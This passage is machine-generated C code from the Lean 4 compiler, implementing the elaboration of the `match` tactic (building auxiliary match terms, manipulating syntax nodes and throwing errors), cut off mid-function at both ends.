2, 0); lean_ctor_set(x_152, 0, x_124); lean_ctor_set(x_152, 1, x_151); x_153 = lean_array_push(x_50, x_152); x_154 = lean_array_push(x_153, x_30); x_155 = l_prec_x28___x29___closed__7; x_156 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_156, 0, x_124); lean_ctor_set(x_156, 1, x_155); x_157 = lean_array_push(x_154, x_156); x_158 = l_Lean_Parser_Tactic_paren___closed__1; x_159 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_159, 0, x_158); lean_ctor_set(x_159, 1, x_157); x_160 = lean_array_push(x_50, x_159); x_161 = l_myMacro____x40_Init_Notation___hyg_1481____closed__8; x_162 = lean_array_push(x_160, x_161); x_163 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_163, 0, x_148); lean_ctor_set(x_163, 1, x_162); x_164 = lean_array_push(x_150, x_163); x_165 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_165, 0, x_145); lean_ctor_set(x_165, 1, x_164); x_166 = lean_array_push(x_50, x_165); x_167 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__5; x_168 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_168, 0, x_167); lean_ctor_set(x_168, 1, x_166); x_169 = lean_array_push(x_50, x_168); x_170 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__3; x_171 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_171, 0, x_170); lean_ctor_set(x_171, 1, x_169); x_172 = lean_array_push(x_135, x_171); x_173 = l_Lean_Parser_Tactic_case___closed__2; x_174 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_174, 0, x_173); lean_ctor_set(x_174, 1, x_172); x_175 = lean_ctor_get(x_125, 0); lean_inc(x_175); x_176 = lean_ctor_get(x_125, 1); lean_inc(x_176); if (lean_is_exclusive(x_125)) { lean_ctor_release(x_125, 0); lean_ctor_release(x_125, 1); x_177 = x_125; } else { lean_dec_ref(x_125); x_177 = lean_box(0); } x_178 = lean_array_push(x_176, x_174); if (lean_is_scalar(x_177)) { x_179 = lean_alloc_ctor(0, 2, 0); } else { x_179 = x_177; } lean_ctor_set(x_179, 0, x_175); lean_ctor_set(x_179, 1, x_178); x_180 = l_Lean_Syntax_setArg(x_28, x_29, x_58); x_181 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_181, 0, x_180); lean_ctor_set(x_181, 1, x_179); x_16 = x_181; x_17 = x_62; goto block_25; } } else { lean_object* x_182; lean_object* x_183; uint8_t x_184; lean_object* x_185; x_182 = lean_array_get_size(x_2); x_183 = lean_unsigned_to_nat(1u); x_184 = lean_nat_dec_lt(x_183, x_182); lean_dec(x_182); lean_inc(x_6); x_185 = l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(x_6, x_7, x_8); if (x_184 == 0) { lean_object* x_186; lean_object* x_187; lean_object* x_188; uint8_t x_189; lean_dec(x_6); x_186 = lean_ctor_get(x_185, 0); lean_inc(x_186); x_187 = lean_ctor_get(x_185, 1); lean_inc(x_187); lean_dec(x_185); lean_inc(x_1); x_188 = l_Lean_mkIdentFrom(x_30, x_1); lean_dec(x_30); x_189 = !lean_is_exclusive(x_186); if (x_189 == 0) { lean_object* x_190; lean_object* x_191; lean_object* x_192; lean_object* x_193; lean_object* x_194; lean_object* x_195; lean_object* x_196; lean_object* x_197; uint8_t x_198; x_190 = lean_ctor_get(x_186, 0); x_191 = lean_ctor_get(x_186, 1); x_192 = l_stx___x3f___closed__3; x_193 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_193, 0, x_190); lean_ctor_set(x_193, 1, x_192); x_194 = l_Array_empty___closed__1; x_195 = lean_array_push(x_194, x_193); x_196 = lean_array_push(x_195, x_188); x_197 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_197, 0, x_31); lean_ctor_set(x_197, 1, x_196); x_198 = !lean_is_exclusive(x_191); if (x_198 == 0) { lean_object* x_199; lean_object* x_200; lean_object* x_201; x_199 = lean_ctor_get(x_191, 0); x_200 = lean_nat_add(x_199, x_183); lean_dec(x_199); lean_ctor_set(x_191, 0, x_200); x_201 = l_Lean_Syntax_setArg(x_28, x_29, x_197); lean_ctor_set(x_186, 0, x_201); x_16 = x_186; x_17 = x_187; goto block_25; } else { lean_object* x_202; lean_object* x_203; lean_object* x_204; lean_object* x_205; lean_object* x_206; x_202 = lean_ctor_get(x_191, 0); x_203 = lean_ctor_get(x_191, 1); lean_inc(x_203); lean_inc(x_202); lean_dec(x_191); x_204 = lean_nat_add(x_202, x_183); lean_dec(x_202); x_205 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_205, 0, x_204); lean_ctor_set(x_205, 1, x_203); x_206 = l_Lean_Syntax_setArg(x_28, x_29, x_197); lean_ctor_set(x_186, 1, x_205); lean_ctor_set(x_186, 0, x_206); x_16 = x_186; x_17 = x_187; goto block_25; } } else { lean_object* x_207; lean_object* x_208; lean_object* x_209; lean_object* x_210; lean_object* x_211; lean_object* x_212; lean_object* x_213; lean_object* x_214; lean_object* x_215; lean_object* x_216; lean_object* x_217; lean_object* x_218; lean_object* x_219; lean_object* x_220; lean_object* x_221; x_207 = lean_ctor_get(x_186, 0); x_208 = lean_ctor_get(x_186, 1); lean_inc(x_208); lean_inc(x_207); lean_dec(x_186); x_209 = l_stx___x3f___closed__3; x_210 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_210, 0, x_207); lean_ctor_set(x_210, 1, x_209); x_211 = l_Array_empty___closed__1; x_212 = lean_array_push(x_211, x_210); x_213 = lean_array_push(x_212, x_188); x_214 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_214, 0, x_31); lean_ctor_set(x_214, 1, x_213); x_215 = lean_ctor_get(x_208, 0); lean_inc(x_215); x_216 = lean_ctor_get(x_208, 1); lean_inc(x_216); if (lean_is_exclusive(x_208)) { lean_ctor_release(x_208, 0); lean_ctor_release(x_208, 1); x_217 = x_208; } else { lean_dec_ref(x_208); x_217 = lean_box(0); } x_218 = lean_nat_add(x_215, x_183); lean_dec(x_215); if (lean_is_scalar(x_217)) { x_219 = lean_alloc_ctor(0, 2, 0); } else { x_219 = x_217; } lean_ctor_set(x_219, 0, x_218); lean_ctor_set(x_219, 1, x_216); x_220 = l_Lean_Syntax_setArg(x_28, x_29, x_214); x_221 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_221, 0, x_220); lean_ctor_set(x_221, 1, x_219); x_16 = x_221; x_17 = x_187; goto block_25; } } else { lean_object* x_222; lean_object* x_223; lean_object* x_224; lean_object* x_225; lean_object* x_226; lean_object* x_227; lean_object* x_228; uint8_t x_229; x_222 = lean_ctor_get(x_185, 0); lean_inc(x_222); x_223 = lean_ctor_get(x_185, 1); lean_inc(x_223); lean_dec(x_185); x_224 = lean_ctor_get(x_6, 0); lean_inc(x_224); lean_dec(x_6); x_225 = l_Lean_Elab_Term_initFn____x40_Lean_Elab_Match___hyg_7269____closed__1; x_226 = l_Lean_Name_appendIndexAfter(x_225, x_224); x_227 = l_Lean_Name_append(x_1, x_226); x_228 = l_Lean_mkIdentFrom(x_30, x_227); lean_dec(x_30); x_229 = !lean_is_exclusive(x_222); if (x_229 == 0) { lean_object* x_230; lean_object* x_231; lean_object* x_232; lean_object* x_233; lean_object* x_234; lean_object* x_235; lean_object* x_236; lean_object* x_237; uint8_t x_238; x_230 = lean_ctor_get(x_222, 0); x_231 = lean_ctor_get(x_222, 1); x_232 = l_stx___x3f___closed__3; x_233 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_233, 0, x_230); lean_ctor_set(x_233, 1, x_232); x_234 = l_Array_empty___closed__1; x_235 = lean_array_push(x_234, x_233); x_236 = lean_array_push(x_235, x_228); x_237 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_237, 0, x_31); lean_ctor_set(x_237, 1, x_236); x_238 = !lean_is_exclusive(x_231); if (x_238 == 0) { lean_object* x_239; lean_object* x_240; lean_object* x_241; x_239 = lean_ctor_get(x_231, 0); x_240 = lean_nat_add(x_239, x_183); lean_dec(x_239); lean_ctor_set(x_231, 0, x_240); x_241 = l_Lean_Syntax_setArg(x_28, x_29, x_237); lean_ctor_set(x_222, 0, x_241); x_16 = x_222; x_17 = x_223; goto block_25; } else { lean_object* x_242; lean_object* x_243; lean_object* x_244; lean_object* x_245; lean_object* x_246; x_242 = lean_ctor_get(x_231, 0); x_243 = lean_ctor_get(x_231, 1); lean_inc(x_243); lean_inc(x_242); lean_dec(x_231); x_244 = lean_nat_add(x_242, x_183); lean_dec(x_242); x_245 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_245, 0, x_244); lean_ctor_set(x_245, 1, x_243); x_246 = l_Lean_Syntax_setArg(x_28, x_29, x_237); lean_ctor_set(x_222, 1, x_245); lean_ctor_set(x_222, 0, x_246); x_16 = x_222; x_17 = x_223; goto block_25; } } else { lean_object* x_247; lean_object* x_248; lean_object* x_249; lean_object* x_250; lean_object* x_251; lean_object* x_252; lean_object* x_253; lean_object* x_254; lean_object* x_255; lean_object* x_256; lean_object* x_257; lean_object* x_258; lean_object* x_259; lean_object* x_260; lean_object* x_261; x_247 = lean_ctor_get(x_222, 0); x_248 = lean_ctor_get(x_222, 1); lean_inc(x_248); lean_inc(x_247); lean_dec(x_222); x_249 = l_stx___x3f___closed__3; x_250 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_250, 0, x_247); lean_ctor_set(x_250, 1, x_249); x_251 = l_Array_empty___closed__1; x_252 = lean_array_push(x_251, x_250); x_253 = lean_array_push(x_252, x_228); x_254 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_254, 0, x_31); lean_ctor_set(x_254, 1, x_253); x_255 = lean_ctor_get(x_248, 0); lean_inc(x_255); x_256 = lean_ctor_get(x_248, 1); lean_inc(x_256); if (lean_is_exclusive(x_248)) { lean_ctor_release(x_248, 0); lean_ctor_release(x_248, 1); x_257 = x_248; } else { lean_dec_ref(x_248); x_257 = lean_box(0); } x_258 = lean_nat_add(x_255, x_183); lean_dec(x_255); if (lean_is_scalar(x_257)) { x_259 = lean_alloc_ctor(0, 2, 0); } else { x_259 = x_257; } lean_ctor_set(x_259, 0, x_258); lean_ctor_set(x_259, 1, x_256); x_260 = l_Lean_Syntax_setArg(x_28, x_29, x_254); x_261 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_261, 0, x_260); lean_ctor_set(x_261, 1, x_259); x_16 = x_261; x_17 = x_223; goto block_25; } } } } else { lean_object* x_262; lean_dec(x_30); x_262 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_262, 0, x_28); lean_ctor_set(x_262, 1, x_6); x_16 = x_262; x_17 = x_8; goto block_25; } block_25: { lean_object* x_18; lean_object* x_19; size_t x_20; size_t x_21; lean_object* x_22; lean_object* x_23; x_18 = lean_ctor_get(x_16, 0); lean_inc(x_18); x_19 = lean_ctor_get(x_16, 1); lean_inc(x_19); lean_dec(x_16); x_20 = 1; x_21 = x_4 + x_20; x_22 = x_18; x_23 = lean_array_uset(x_15, x_4, x_22); x_4 = x_21; x_5 = x_23; x_6 = x_19; x_8 = x_17; goto _start; } } } } static lean_object* _init_l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1() { _start: { size_t x_1; lean_object* x_2; x_1 = 0; x_2 = lean_box_usize(x_1); return x_2; } } lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5) { _start: { lean_object* x_6; lean_object* x_7; lean_object* x_8; lean_object* x_9; lean_object* x_10; lean_object* x_11; size_t x_12; lean_object* x_13; lean_object* x_14; lean_object* x_15; lean_object* x_16; lean_object* x_17; lean_object* x_18; x_6 = lean_unsigned_to_nat(4u); x_7 = l_Lean_Syntax_getArg(x_2, x_6); x_8 = lean_unsigned_to_nat(0u); x_9 = l_Lean_Syntax_getArg(x_7, x_8); lean_dec(x_7); x_10 = l_Lean_Syntax_getArgs(x_9); lean_dec(x_9); x_11 = lean_array_get_size(x_10); x_12 = lean_usize_of_nat(x_11); lean_dec(x_11); lean_inc(x_10); x_13 = x_10; x_14 = lean_box_usize(x_12); x_15 = l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1; x_16 = lean_alloc_closure((void*)(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___boxed), 8, 5); lean_closure_set(x_16, 0, x_1); lean_closure_set(x_16, 1, x_10); lean_closure_set(x_16, 2, x_14); lean_closure_set(x_16, 3, x_15); lean_closure_set(x_16, 4, x_13); x_17 = x_16; x_18 = lean_apply_3(x_17, x_3, x_4, x_5); if (lean_obj_tag(x_18) == 0) { uint8_t x_19; x_19 = !lean_is_exclusive(x_18); if (x_19 == 0) { lean_object* x_20; uint8_t x_21; x_20 = lean_ctor_get(x_18, 0); x_21 = !lean_is_exclusive(x_20); if (x_21 == 0) { lean_object* x_22; lean_object* x_23; lean_object* x_24; lean_object* x_25; lean_object* x_26; lean_object* x_27; lean_object* x_28; lean_object* x_29; lean_object* x_30; lean_object* x_31; x_22 = lean_ctor_get(x_20, 0); x_23 = l_myMacro____x40_Init_Notation___hyg_13954____closed__2; x_24 = l_Lean_Syntax_setKind(x_2, x_23); x_25 = l_Lean_nullKind; x_26 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_26, 0, x_25); lean_ctor_set(x_26, 1, x_22); x_27 = l_Lean_mkOptionalNode___closed__2; x_28 = lean_array_push(x_27, x_26); x_29 = l_myMacro____x40_Init_Notation___hyg_13954____closed__8; x_30 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_30, 0, x_29); lean_ctor_set(x_30, 1, x_28); x_31 = l_Lean_Syntax_setArg(x_24, x_6, x_30); lean_ctor_set(x_20, 0, x_31); return x_18; } else { lean_object* x_32; lean_object* x_33; lean_object* x_34; lean_object* x_35; lean_object* x_36; lean_object* x_37; lean_object* x_38; lean_object* x_39; lean_object* x_40; lean_object* x_41; lean_object* x_42; lean_object* x_43; x_32 = lean_ctor_get(x_20, 0); x_33 = lean_ctor_get(x_20, 1); lean_inc(x_33); lean_inc(x_32); lean_dec(x_20); x_34 = l_myMacro____x40_Init_Notation___hyg_13954____closed__2; x_35 = l_Lean_Syntax_setKind(x_2, x_34); x_36 = l_Lean_nullKind; x_37 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_37, 0, x_36); lean_ctor_set(x_37, 1, x_32); x_38 = l_Lean_mkOptionalNode___closed__2; x_39 = lean_array_push(x_38, x_37); x_40 = l_myMacro____x40_Init_Notation___hyg_13954____closed__8; x_41 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_41, 0, x_40); lean_ctor_set(x_41, 1, x_39); x_42 = l_Lean_Syntax_setArg(x_35, x_6, x_41); x_43 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_43, 0, x_42); lean_ctor_set(x_43, 1, x_33); lean_ctor_set(x_18, 0, x_43); return x_18; } } else { lean_object* x_44; lean_object* x_45; lean_object* x_46; lean_object* x_47; lean_object* x_48; lean_object* x_49; lean_object* x_50; lean_object* x_51; lean_object* x_52; lean_object* x_53; lean_object* x_54; lean_object* x_55; lean_object* x_56; lean_object* x_57; lean_object* x_58; lean_object* x_59; x_44 = lean_ctor_get(x_18, 0); x_45 = lean_ctor_get(x_18, 1); lean_inc(x_45); lean_inc(x_44); lean_dec(x_18); x_46 = lean_ctor_get(x_44, 0); lean_inc(x_46); x_47 = lean_ctor_get(x_44, 1); lean_inc(x_47); if (lean_is_exclusive(x_44)) { lean_ctor_release(x_44, 0); lean_ctor_release(x_44, 1); x_48 = x_44; } else { lean_dec_ref(x_44); x_48 = lean_box(0); } x_49 = l_myMacro____x40_Init_Notation___hyg_13954____closed__2; x_50 = l_Lean_Syntax_setKind(x_2, x_49); x_51 = l_Lean_nullKind; x_52 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_52, 0, x_51); lean_ctor_set(x_52, 1, x_46); x_53 = l_Lean_mkOptionalNode___closed__2; x_54 = lean_array_push(x_53, x_52); x_55 = l_myMacro____x40_Init_Notation___hyg_13954____closed__8; x_56 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_56, 0, x_55); lean_ctor_set(x_56, 1, x_54); x_57 = l_Lean_Syntax_setArg(x_50, x_6, x_56); if (lean_is_scalar(x_48)) { x_58 = lean_alloc_ctor(0, 2, 0); } else { x_58 = x_48; } lean_ctor_set(x_58, 0, x_57); lean_ctor_set(x_58, 1, x_47); x_59 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_59, 0, x_58); lean_ctor_set(x_59, 1, x_45); return x_59; } } else { uint8_t x_60; lean_dec(x_2); x_60 = !lean_is_exclusive(x_18); if (x_60 == 0) { return x_18; } else { lean_object* x_61; lean_object* x_62; lean_object* x_63; x_61 = lean_ctor_get(x_18, 0); x_62 = lean_ctor_get(x_18, 1); lean_inc(x_62); lean_inc(x_61); lean_dec(x_18); x_63 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_63, 0, x_61); lean_ctor_set(x_63, 1, x_62); return x_63; } } } } lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; x_4 = l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(x_1, x_2, x_3); lean_dec(x_2); return x_4; } } lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8) { _start: { size_t x_9; size_t x_10; lean_object* x_11; x_9 = lean_unbox_usize(x_3); lean_dec(x_3); x_10 = lean_unbox_usize(x_4); lean_dec(x_4); x_11 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2(x_1, x_2, x_9, x_10, x_5, x_6, x_7, x_8); lean_dec(x_2); return x_11; } } lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1___rarg(lean_object* x_1, lean_object* x_2) { _start: { lean_object* x_3; lean_object* x_4; lean_object* x_5; x_3 = lean_ctor_get(x_1, 0); lean_inc(x_3); x_4 = lean_ctor_get(x_1, 1); lean_inc(x_4); lean_dec(x_1); x_5 = lean_apply_2(x_2, x_3, x_4); return x_5; } } lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1(lean_object* x_1) { _start: { lean_object* x_2; x_2 = lean_alloc_closure((void*)(l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1___rarg), 2, 0); return x_2; } } static lean_object* _init_l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1() { _start: { lean_object* x_1; lean_object* x_2; lean_object* x_3; x_1 = lean_unsigned_to_nat(1u); x_2 = l_Array_empty___closed__1; x_3 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_3, 0, x_1); lean_ctor_set(x_3, 1, x_2); return x_3; } } lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4) { _start: { lean_object* x_5; lean_object* x_6; x_5 = l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1; x_6 = l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux(x_1, x_2, x_5, x_3, x_4); if (lean_obj_tag(x_6) == 0) { lean_object* x_7; lean_object* x_8; uint8_t x_9; x_7 = lean_ctor_get(x_6, 0); lean_inc(x_7); x_8 = lean_ctor_get(x_7, 1); lean_inc(x_8); x_9 = !lean_is_exclusive(x_6); if (x_9 == 0) { lean_object* x_10; uint8_t x_11; x_10 = lean_ctor_get(x_6, 0); lean_dec(x_10); x_11 = !lean_is_exclusive(x_7); if (x_11 == 0) { lean_object* x_12; lean_object* x_13; x_12 = lean_ctor_get(x_7, 1); lean_dec(x_12); x_13 = lean_ctor_get(x_8, 1); lean_inc(x_13); lean_dec(x_8); lean_ctor_set(x_7, 1, x_13); return x_6; } else { lean_object* x_14; lean_object* x_15; lean_object* x_16; x_14 = lean_ctor_get(x_7, 0); lean_inc(x_14); lean_dec(x_7); x_15 = lean_ctor_get(x_8, 1); lean_inc(x_15); lean_dec(x_8); x_16 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_16, 0, x_14); lean_ctor_set(x_16, 1, x_15); lean_ctor_set(x_6, 0, x_16); return x_6; } } else { lean_object* x_17; lean_object* x_18; lean_object* x_19; lean_object* x_20; lean_object* x_21; lean_object* x_22; x_17 = lean_ctor_get(x_6, 1); lean_inc(x_17); lean_dec(x_6); x_18 = lean_ctor_get(x_7, 0); lean_inc(x_18); if (lean_is_exclusive(x_7)) { lean_ctor_release(x_7, 0); lean_ctor_release(x_7, 1); x_19 = x_7; } else { lean_dec_ref(x_7); x_19 = lean_box(0); } x_20 = lean_ctor_get(x_8, 1); lean_inc(x_20); lean_dec(x_8); if (lean_is_scalar(x_19)) { x_21 = lean_alloc_ctor(0, 2, 0); } else { x_21 = x_19; } lean_ctor_set(x_21, 0, x_18); lean_ctor_set(x_21, 1, x_20); x_22 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_22, 0, x_21); lean_ctor_set(x_22, 1, x_17); return x_22; } } else { uint8_t x_23; x_23 = !lean_is_exclusive(x_6); if (x_23 == 0) { return x_6; } else { lean_object* x_24; lean_object* x_25; lean_object* x_26; x_24 = lean_ctor_get(x_6, 0); x_25 = lean_ctor_get(x_6, 1); lean_inc(x_25); lean_inc(x_24); lean_dec(x_6); x_26 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_26, 0, x_24); lean_ctor_set(x_26, 1, x_25); return x_26; } } } } lean_object* l_Lean_Elab_Tactic_evalMatch_match__1___rarg(lean_object* x_1, lean_object* x_2) { _start: { lean_object* x_3; lean_object* x_4; lean_object* x_5; x_3 = lean_ctor_get(x_1, 0); lean_inc(x_3); x_4 = lean_ctor_get(x_1, 1); lean_inc(x_4); lean_dec(x_1); x_5 = lean_apply_2(x_2, x_3, x_4); return x_5; } } lean_object* l_Lean_Elab_Tactic_evalMatch_match__1(lean_object* x_1) { _start: { lean_object* x_2; x_2 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalMatch_match__1___rarg), 2, 0); return x_2; } } lean_object* l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; lean_object* x_12; uint8_t x_13; x_11 = lean_ctor_get(x_8, 3); x_12 = l_Lean_addMessageContextFull___at_Lean_Meta_instAddMessageContextMetaM___spec__1(x_1, x_6, x_7, x_8, x_9, x_10); x_13 = !lean_is_exclusive(x_12); if (x_13 == 0) { lean_object* x_14; lean_object* x_15; x_14 = lean_ctor_get(x_12, 0); lean_inc(x_11); x_15 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_15, 0, x_11); lean_ctor_set(x_15, 1, x_14); lean_ctor_set_tag(x_12, 1); lean_ctor_set(x_12, 0, x_15); return x_12; } else { lean_object* x_16; lean_object* x_17; lean_object* x_18; lean_object* x_19; x_16 = lean_ctor_get(x_12, 0); x_17 = lean_ctor_get(x_12, 1); lean_inc(x_17); lean_inc(x_16); lean_dec(x_12); lean_inc(x_11); x_18 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_18, 0, x_11); lean_ctor_set(x_18, 1, x_16); x_19 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_19, 0, x_18); lean_ctor_set(x_19, 1, x_17); return x_19; } } } lean_object* l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10, lean_object* x_11) { _start: { uint8_t x_12; x_12 = !lean_is_exclusive(x_9); if (x_12 == 0) { lean_object* x_13; lean_object* x_14; lean_object* x_15; x_13 = lean_ctor_get(x_9, 3); x_14 = l_Lean_replaceRef(x_1, x_13); lean_dec(x_13); lean_ctor_set(x_9, 3, x_14); x_15 = l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10, x_11); lean_dec(x_9); return x_15; } else { lean_object* x_16; lean_object* x_17; lean_object* x_18; lean_object* x_19; lean_object* x_20; lean_object* x_21; lean_object* x_22; lean_object* x_23; lean_object* x_24; lean_object* x_25; lean_object* x_26; x_16 = lean_ctor_get(x_9, 0); x_17 = lean_ctor_get(x_9, 1); x_18 = lean_ctor_get(x_9, 2); x_19 = lean_ctor_get(x_9, 3); x_20 = lean_ctor_get(x_9, 4); x_21 = lean_ctor_get(x_9, 5); x_22 = lean_ctor_get(x_9, 6); x_23 = lean_ctor_get(x_9, 7); lean_inc(x_23); lean_inc(x_22); lean_inc(x_21); lean_inc(x_20); lean_inc(x_19); lean_inc(x_18); lean_inc(x_17); lean_inc(x_16); lean_dec(x_9); x_24 = l_Lean_replaceRef(x_1, x_19); lean_dec(x_19); x_25 = lean_alloc_ctor(0, 8, 0); lean_ctor_set(x_25, 0, x_16); lean_ctor_set(x_25, 1, x_17); lean_ctor_set(x_25, 2, x_18); lean_ctor_set(x_25, 3, x_24); lean_ctor_set(x_25, 4, x_20); lean_ctor_set(x_25, 5, x_21); lean_ctor_set(x_25, 6, x_22); lean_ctor_set(x_25, 7, x_23); x_26 = l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_25, x_10, x_11); lean_dec(x_25); return x_26; } } } lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___rarg(lean_object* x_1) { _start: { lean_object* x_2; lean_object* x_3; x_2 = l_Lean_Elab_throwUnsupportedSyntax___rarg___closed__1; x_3 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_3, 0, x_2); lean_ctor_set(x_3, 1, x_1); return x_3; } } lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8) { _start: { lean_object* x_9; x_9 = lean_alloc_closure((void*)(l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___rarg), 1, 0); return x_9; } } lean_object* l_Lean_Elab_Tactic_evalMatch(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; x_11 = l_Lean_Elab_Tactic_getMainTag(x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10); if (lean_obj_tag(x_11) == 0) { lean_object* x_12; lean_object* x_13; lean_object* x_14; lean_object* x_15; lean_object* x_40; lean_object* x_41; lean_object* x_42; lean_object* x_43; lean_object* x_44; lean_object* x_45; lean_object* x_46; lean_object* x_47; lean_object* x_48; lean_object* x_49; lean_object* x_50; lean_object* x_51; lean_object* x_52; lean_object* x_53; lean_object* x_54; lean_object* x_55; lean_object* x_56; lean_object* x_57; lean_object* x_58; x_12 = lean_ctor_get(x_11, 0); lean_inc(x_12); x_13 = lean_ctor_get(x_11, 1); lean_inc(x_13); lean_dec(x_11); x_40 = lean_st_ref_get(x_9, x_13); x_41 = lean_ctor_get(x_40, 0); lean_inc(x_41); x_42 = lean_ctor_get(x_40, 1); lean_inc(x_42); lean_dec(x_40); x_43 = lean_ctor_get(x_41, 0); lean_inc(x_43); lean_dec(x_41); x_44 = lean_ctor_get(x_8, 3); lean_inc(x_44); x_45 = l_Lean_Elab_Term_getCurrMacroScope(x_4, x_5, x_6, x_7, x_8, x_9, x_42); x_46 = lean_ctor_get(x_45, 0); lean_inc(x_46); x_47 = lean_ctor_get(x_45, 1); lean_inc(x_47); lean_dec(x_45); x_48 = lean_ctor_get(x_8, 1); lean_inc(x_48); x_49 = lean_ctor_get(x_8, 2); lean_inc(x_49); x_50 = lean_st_ref_get(x_9, x_47); x_51 = lean_ctor_get(x_50, 0); lean_inc(x_51); x_52 = lean_ctor_get(x_50, 1); lean_inc(x_52); lean_dec(x_50); x_53 = lean_ctor_get(x_51, 1); lean_inc(x_53); lean_dec(x_51); lean_inc(x_43); x_54 = 